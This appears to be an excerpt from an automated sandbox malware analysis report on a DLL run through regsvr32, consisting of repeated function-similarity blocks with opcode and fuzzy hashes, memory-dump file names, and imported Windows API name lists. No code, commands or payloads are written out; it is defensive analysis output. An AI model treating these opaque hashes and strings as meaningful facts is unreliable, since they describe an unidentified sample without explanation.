                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 3298025750-0
                                                                                                                • Opcode ID: a32a4509cc01343f6624d56551bf29a204b5bdace136aad5ad6c743c541d4cab
                                                                                                                • Instruction ID: 96d68635fa6e966451ce5a6557257a96f5b5cd059c80231d5daa39f193461f66
                                                                                                                • Opcode Fuzzy Hash: a32a4509cc01343f6624d56551bf29a204b5bdace136aad5ad6c743c541d4cab
                                                                                                                • Instruction Fuzzy Hash: 4F41B462B14A5442EB04CE6AEA147A97391B748FD4B49903ADE0EE7B55DF7CE045C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a4b53deb9b326550e1ae9d237c41ce3acb1c9664bd76a452e97be22bd27abd01
                                                                                                                • Instruction ID: aec3fd1b173773e43bfa1b360ff93c6f3109e084809434a07163bb30b2d939a9
                                                                                                                • Opcode Fuzzy Hash: a4b53deb9b326550e1ae9d237c41ce3acb1c9664bd76a452e97be22bd27abd01
                                                                                                                • Instruction Fuzzy Hash: 2431C9727244F0479BACCA3A9C705793AD2E39E702B84913EEE9687784D53DD505CB20
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0c9d88f403361e01f38285ca8cf51143f86f5098289194aad908f815a59a3809
                                                                                                                • Instruction ID: 52bdd9893182e23ee5c68da371fea09336a911b986188174442933032e64c899
                                                                                                                • Opcode Fuzzy Hash: 0c9d88f403361e01f38285ca8cf51143f86f5098289194aad908f815a59a3809
                                                                                                                • Instruction Fuzzy Hash: 373148A2E3C10285F6A5D5F9C504F7A124ABF81740EECC439C50BA1B99CDAFB84FD602
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 54ff7f6cc40f6573ef0bc3d156123290f582f22433635047970340876ea546e7
                                                                                                                • Instruction ID: 13e778255e35beb4156859f446da214ad4fef10c0bb4cdd99bfc94e32c66d2fd
                                                                                                                • Opcode Fuzzy Hash: 54ff7f6cc40f6573ef0bc3d156123290f582f22433635047970340876ea546e7
                                                                                                                • Instruction Fuzzy Hash: DA3150A3E3C14249F6A5C5B9C564F791252BFA1340EACC439D10FA2B99CDADB84FD701
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8ff7df8b1ddb11b189353315002553438b8f9567d2e1ff1561c95ca71f075b67
                                                                                                                • Instruction ID: 93f34f0afc0675fe7f7eb4203f7eb0ada1b14f4a309307537f112bf006c8a61e
                                                                                                                • Opcode Fuzzy Hash: 8ff7df8b1ddb11b189353315002553438b8f9567d2e1ff1561c95ca71f075b67
                                                                                                                • Instruction Fuzzy Hash: F02175B2B20D494BDB5CC93D84523AE26C797E8728F84C5396E4BC33C9DC75CC928645
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 47f05ff30cf6eb39d773e8df6358173213e473f9b2e52eb0a7c3e6c8dd7b4964
                                                                                                                • Instruction ID: c711c1d0c613bd5515530da350c8e4ca5ed94543b773b7c70c0b64e085de40df
                                                                                                                • Opcode Fuzzy Hash: 47f05ff30cf6eb39d773e8df6358173213e473f9b2e52eb0a7c3e6c8dd7b4964
                                                                                                                • Instruction Fuzzy Hash: 8F111D93C0D6C24AE7A3CF7848256792F60BB52E05B8E41BEC289E75D7D88DB918C605
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8d0e76a458e7e86889931c1b61db7d1b1b88de21c951ff1edfed88d6252016d7
                                                                                                                • Instruction ID: 9a67b0e8f661a07143caa821d15b509aabd2d8ab841d64e1bbfbc9fc581311b8
                                                                                                                • Opcode Fuzzy Hash: 8d0e76a458e7e86889931c1b61db7d1b1b88de21c951ff1edfed88d6252016d7
                                                                                                                • Instruction Fuzzy Hash: BE11CE9394D6C24AE7A3CF7848256782F60AB52E0578E41BEC2C9E71D7D88EB918C201
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0ba3cc9dbf3b82e5dcc65de195548ebb1ec61654d45191e665b74e3eb1c478ec
                                                                                                                • Instruction ID: 03ffbf90b2178fd3bfb34f3914d81802d755c16ceb986fd946015065aa9df27f
                                                                                                                • Opcode Fuzzy Hash: 0ba3cc9dbf3b82e5dcc65de195548ebb1ec61654d45191e665b74e3eb1c478ec
                                                                                                                • Instruction Fuzzy Hash: E0F04FB1A192959BEBA5CF28B852B297790F708384B94803DD68DD3B04D67CA061CF04
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5ff4330b36aff1a69d14fbeab58c7ec95cb26ed8bcf90d48fbfbf92d974ea576
                                                                                                                • Instruction ID: 1ecec1d21ecf48004efffa603c1f64d935dfaac1bbe24ebc09643c72be018d9e
                                                                                                                • Opcode Fuzzy Hash: 5ff4330b36aff1a69d14fbeab58c7ec95cb26ed8bcf90d48fbfbf92d974ea576
                                                                                                                • Instruction Fuzzy Hash: 77C08C63C8C8C38AC3A1CE3044A1BB22FE0EF12604B480078C1849B046C888B4188301
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 70b98fd80eff30161be0de585c47960d68e1db4de27e21936376fdb8e8dc8e2d
                                                                                                                • Instruction ID: c6a3dc9f08f2e5f542d55ffbdbd9038bce26f3c3306d82f4439e2653d76fa616
                                                                                                                • Opcode Fuzzy Hash: 70b98fd80eff30161be0de585c47960d68e1db4de27e21936376fdb8e8dc8e2d
                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5b12e7abc5248dfae98b7a15744594f2f3936a1afe8a61d66670582f0ff56e4e
                                                                                                                • Instruction ID: 0219d59f0d01346e703c42b1cbde15efaacbf6a5e45960a17d20046431c36095
                                                                                                                • Opcode Fuzzy Hash: 5b12e7abc5248dfae98b7a15744594f2f3936a1afe8a61d66670582f0ff56e4e
                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6cdd0b053bcc22954df321bc98f57924f2cff0ca9e89a1d11b6e2833c4481067
                                                                                                                • Instruction ID: ae2802040534d34daf8f1f4707f0066bea24c9b6d75ed02a837e3ce9ef37a814
                                                                                                                • Opcode Fuzzy Hash: 6cdd0b053bcc22954df321bc98f57924f2cff0ca9e89a1d11b6e2833c4481067
                                                                                                                • Instruction Fuzzy Hash: B990026250D2D78FD3229E7444141993B109701504B054471C35485445D9987264DB01
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                                                                • API String ID: 667068680-295688737
                                                                                                                • Opcode ID: 31aef0777b1de9e4a5d0e70d6233b940c94261a6b1fb32c0ecc6951f39619457
                                                                                                                • Instruction ID: ffc7e783c32f21049b65c1fcb29794e8f0b45e340749f076c369a9c6d146b1ad
                                                                                                                • Opcode Fuzzy Hash: 31aef0777b1de9e4a5d0e70d6233b940c94261a6b1fb32c0ecc6951f39619457
                                                                                                                • Instruction Fuzzy Hash: DCA17DA5A0DB07A1EE05DB90B858A742BA4BF49B44BCA503DC44EE6225EFFCF14DC700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 5691c606f068ee66f2b65d8c89de9f993ac27705dbd55f5b
                                                                                                                • API String ID: 0-66563769
                                                                                                                • Opcode ID: ef56c539fac788341cbbd174a640baf9b45679d56576a349dff745072f2d4928
                                                                                                                • Instruction ID: 79a693bfef0bd55469a6b00fcb8f1745e633545e3a9f843728b0e19fae800729
                                                                                                                • Opcode Fuzzy Hash: ef56c539fac788341cbbd174a640baf9b45679d56576a349dff745072f2d4928
                                                                                                                • Instruction Fuzzy Hash: D3A155A29156C2C4EB10EFB0D895BF92255FF44388FC49539E94E5B58ADEBCF158C340
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FolderPath
                                                                                                                • String ID: 5814200fdccd6a360d77410a1d883cd51c6d3e5af2504a$a7b2e3dcbd563607bcb20621dc9ed30be13cb30bd3f78ce436ed9fd17f$list too long
                                                                                                                • API String ID: 1514166925-2677482326
                                                                                                                • Opcode ID: 98bdc2807fabc532d9f8cbc4b4b5e9e2d380288cbbdcf934b25f105f5883ba5e
                                                                                                                • Instruction ID: fee57566fbb3b98cdb226659115f24770d96cd8c46ec4924200c8d7c0f57b09a
                                                                                                                • Opcode Fuzzy Hash: 98bdc2807fabc532d9f8cbc4b4b5e9e2d380288cbbdcf934b25f105f5883ba5e
                                                                                                                • Instruction Fuzzy Hash: 4E819A63D2868281E700EBA0E491BBD6364FF45384FC49538E54EA769ADFBCF158C740
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c56bb068b1990f9dc96083dc4ab3c177a30c71a3ccd033f6702d8a69f25ecd2e
                                                                                                                • Instruction ID: 94a158356d6a15d40388cfc193a00fb02d45beaa1888aac9a9e03a42ab443649
                                                                                                                • Opcode Fuzzy Hash: c56bb068b1990f9dc96083dc4ab3c177a30c71a3ccd033f6702d8a69f25ecd2e
                                                                                                                • Instruction Fuzzy Hash: 79319D92D6A58384E710F7A064EABBA1159FF06784FC8DC39F54EAB58BDD9E7068C100
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                Strings
                                                                                                                • 980245d50706ff3f0ed2ada3505e009dcbaa9d2d4f2795c5a51ec70b29, xrefs: 00007FF983DA0A20
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CompatibleCreateDesktopFolderLibraryLoadLocalPathTimeWindow
                                                                                                                • String ID: 980245d50706ff3f0ed2ada3505e009dcbaa9d2d4f2795c5a51ec70b29
                                                                                                                • API String ID: 2601952691-677446042
                                                                                                                • Opcode ID: da83c19f50f070e52fecaaa979e49698d406f453bfd702e0239ec3ceebc086fe
                                                                                                                • Instruction ID: 752bf41aba87834b3b3479a7e6196cc90cbdee403fb33eea6f0928ae6a95cff3
                                                                                                                • Opcode Fuzzy Hash: da83c19f50f070e52fecaaa979e49698d406f453bfd702e0239ec3ceebc086fe
                                                                                                                • Instruction Fuzzy Hash: 8551DCA2E5868281E710FBA0E495BBE2355FF45784FC89538F54E9769ACEBCF448C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$CloseFileHandleWrite
                                                                                                                • String ID: 384865358c1009170caffeb6d4d848844a676523d9bb81a4864cca19$9972d150b78185e350433cf98f8fbb1dbb$a0dd4dc1ce5277f8a538af9b58b895e980724cad41
                                                                                                                • API String ID: 971768948-3814959899
                                                                                                                • Opcode ID: 809e63a630d8751318ffbc35f603ce10ec398286e3e41b0005349b8f20c45a87
                                                                                                                • Instruction ID: 1ae7df3bf11ac222d957cfab1e754694742f310a18bcc325ce956c77dd6989d6
                                                                                                                • Opcode Fuzzy Hash: 809e63a630d8751318ffbc35f603ce10ec398286e3e41b0005349b8f20c45a87
                                                                                                                • Instruction Fuzzy Hash: CC0274A2B1468185EF00DFB4D4847AD2361FB457A8F945235EA6D67BEADFBCE184C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$CloseFileHandleWrite
                                                                                                                • String ID: 384865358c1009170caffeb6d4d848844a676523d9bb81a4864cca19$9972d150b78185e350433cf98f8fbb1dbb$a0dd4dc1ce5277f8a538af9b58b895e980724cad41
                                                                                                                • API String ID: 971768948-3814959899
                                                                                                                • Opcode ID: 2ea32b6012aa963e30e036a40d0186dd1f2715e2be965862b184367db17ea51d
                                                                                                                • Instruction ID: 0064c10d941ad0fc8198e7a09462518efd3f10788e2cc7c66c88b744bb882abc
